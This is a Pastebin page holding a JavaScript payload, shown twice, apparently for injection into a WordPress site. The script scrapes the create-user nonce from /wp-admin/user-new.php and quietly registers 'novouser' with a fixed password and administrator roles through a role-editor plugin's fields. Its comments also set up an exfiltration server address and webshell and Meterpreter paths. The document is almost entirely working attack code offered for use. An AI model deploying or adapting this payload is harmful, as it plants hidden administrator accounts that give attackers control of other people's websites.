a - Pastebin

From a, 1 Year ago, written in JavaScript.

Embed

Download Paste or View Raw
Hits: 73

// Web server listening for exfil data

// This will be as base64 data with a .js added, trying to

// include a non-exist remote javascript file so you

// get the base64 data in the 404 log

var httpExfilServer = "http://192.168.78.135:8888";

// This will hold the webshell locations

// Note that different wordpress servers

// will save these in different locations,

// we don't control the directory name.

// The add plugin function will parse out

// the correct directory name and update

// these variables as necessary.

var webShellPath = "shell/shell.php";

var phpMetShellPath = "shell/meterpreter.php";

const sleep = (milliseconds) =>

{

return new Promise(resolve => setTimeout(resolve, milliseconds))

}

function read_body(xhr)

{

var data;

if (!xhr.responseType || xhr.responseType === "text")

{

data = xhr.responseText;

}

else if (xhr.responseType === "document")

{

data = xhr.responseXML;

}

else if (xhr.responseType === "json")

{

data = xhr.responseJSON;

}

else

{

data = xhr.response;

}

return data;

}

function addAdminUser()

{

var uri = "/wp-admin/user-new.php";

// The following user will be added as an Administrator level user

var username = "novouser";

var email = "[email protected]"

var firstName = "trevor";

var lastName = "roach";

var password = "PasswordStrongEnought";

xhr = new XMLHttpRequest();

xhr.open("GET", uri, true);

xhr.send(null);

xhr.onreadystatechange = function()

{

if (xhr.readyState == XMLHttpRequest.DONE)

{

var response = read_body(xhr);

var noncePos = response.indexOf('name="_wpnonce_create-user" value="');

var nonceVal = response.substring(noncePos+35, noncePos+45);

xhr = new XMLHttpRequest();

xhr.open("POST", uri);

xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");

xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

var body = "action=createuser&"

body += "_wpnonce_create-user=" + nonceVal + "&";

body += "_wp_http_referer=%2Fwp-admin%2Fuser-new.php&"

body += "user_login=" + username + "&";

body += "email=" + email + "&";

body += "first_name=" + firstName + "&";

body += "last_name=" + lastName + "&";

body += "uri=&";

body += "pass1=" + password + "&";

body += "pass1-text=" + password + "&";

body += "pass2=" + password + "&";

body += "pw_weak=on&";

body += "send_user_notification=0&";

body += "role=subscriber&";

body += "ure_select_other_roles=administrator&"; // muahahahaha

body += "ure_other_roles=administrator&"; // insert Dr. Evil second muahahahaha

body += "createuser=Add+New+User";

xhr.send(body);

console.log("test inner")

}

console.log("text outer")

}

console.log("LOADED");

alert("loaded");

}

addAdminUser();

Author

Title

Language

Your paste - Paste your paste here

// Web server listening for exfil data
// This will be as base64 data with a .js added, trying to 
// include a non-exist remote javascript file so you 
// get the base64 data in the 404 log
var httpExfilServer = &quot;http://192.168.78.135:8888&quot;;

// This will hold the webshell locations
// Note that different wordpress servers
// will save these in different locations, 
// we don't control the directory name.
// The add plugin function will parse out 
// the correct directory name and update
// these variables as necessary. 
var webShellPath    = &quot;shell/shell.php&quot;;
var phpMetShellPath = &quot;shell/meterpreter.php&quot;;

const sleep = (milliseconds) =&gt; 
{
	return new Promise(resolve =&gt; setTimeout(resolve, milliseconds))
}

function read_body(xhr) 
{ 
	var data;

if (!xhr.responseType || xhr.responseType === &quot;text&quot;) 
	{
		data = xhr.responseText;
	} 
	else if (xhr.responseType === &quot;document&quot;) 
	{
		data = xhr.responseXML;
	} 
	else if (xhr.responseType === &quot;json&quot;) 
	{
		data = xhr.responseJSON;
	} 
	else 
	{
		data = xhr.response;
	}
	return data; 
}

function addAdminUser()
{
	var uri = &quot;/wp-admin/user-new.php&quot;;

// The following user will be added as an Administrator level user
	var username  = &quot;novouser&quot;;
	var email     = &quot;teste@teste.com&quot;
	var firstName = &quot;trevor&quot;;
	var lastName  = &quot;roach&quot;;
	var password  = &quot;PasswordStrongEnought&quot;;

xhr = new XMLHttpRequest();

xhr.open(&quot;GET&quot;, uri, true);
	xhr.send(null);

xhr.onreadystatechange = function()
	{
		if (xhr.readyState == XMLHttpRequest.DONE)
		{
			var response = read_body(xhr);
			var noncePos = response.indexOf('name=&quot;_wpnonce_create-user&quot; value=&quot;');
			var nonceVal = response.substring(noncePos+35, noncePos+45);

xhr = new XMLHttpRequest();
			xhr.open(&quot;POST&quot;, uri);

xhr.setRequestHeader(&quot;Accept&quot;, &quot;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&quot;);
 			xhr.setRequestHeader(&quot;Content-Type&quot;, &quot;application/x-www-form-urlencoded&quot;);

var body = &quot;action=createuser&amp;&quot;
			body += &quot;_wpnonce_create-user=&quot; + nonceVal + &quot;&amp;&quot;; 
			body += &quot;_wp_http_referer=%2Fwp-admin%2Fuser-new.php&amp;&quot;
			body += &quot;user_login=&quot; + username + &quot;&amp;&quot;;
			body += &quot;email=&quot; + email + &quot;&amp;&quot;;
			body += &quot;first_name=&quot; + firstName + &quot;&amp;&quot;;
			body += &quot;last_name=&quot; + lastName + &quot;&amp;&quot;;
			body += &quot;uri=&amp;&quot;;
			body += &quot;pass1=&quot; + password + &quot;&amp;&quot;;
			body += &quot;pass1-text=&quot; + password + &quot;&amp;&quot;;
			body += &quot;pass2=&quot; + password + &quot;&amp;&quot;;
			body += &quot;pw_weak=on&amp;&quot;;
			body += &quot;send_user_notification=0&amp;&quot;;
			body += &quot;role=subscriber&amp;&quot;;
			body += &quot;ure_select_other_roles=administrator&amp;&quot;; // muahahahaha 
			body += &quot;ure_other_roles=administrator&amp;&quot;; // insert Dr. Evil second muahahahaha
			body += &quot;createuser=Add+New+User&quot;;

xhr.send(body);
            console.log(&quot;test inner&quot;)
		}
        console.log(&quot;text outer&quot;)
	}

console.log(&quot;LOADED&quot;);
    alert(&quot;loaded&quot;);
}

addAdminUser();

Private - Private paste aren't shown in recent listings.

Delete After - When should we delete your paste?

Spam protection -

{"html5":"htmlmixed","css":"css","javascript":"javascript","php":"php","python":"python","ruby":"ruby","lua":"text\/x-lua","bash":"text\/x-sh","go":"go","c":"text\/x-csrc","cpp":"text\/x-c++src","diff":"diff","latex":"stex","sql":"sql","xml":"xml","apl":"apl","asterisk":"asterisk","c_loadrunner":"text\/x-csrc","c_mac":"text\/x-csrc","coffeescript":"text\/x-coffeescript","csharp":"text\/x-csharp","d":"d","ecmascript":"javascript","erlang":"erlang","groovy":"text\/x-groovy","haskell":"text\/x-haskell","haxe":"text\/x-haxe","html4strict":"htmlmixed","java":"text\/x-java","java5":"text\/x-java","jquery":"javascript","mirc":"mirc","mysql":"sql","ocaml":"text\/x-ocaml","pascal":"text\/x-pascal","perl":"perl","perl6":"perl","plsql":"sql","properties":"text\/x-properties","q":"text\/x-q","scala":"scala","scheme":"text\/x-scheme","tcl":"text\/x-tcl","vb":"text\/x-vb","verilog":"text\/x-verilog","yaml":"text\/x-yaml","z80":"text\/x-z80"}

a

Reply to "a"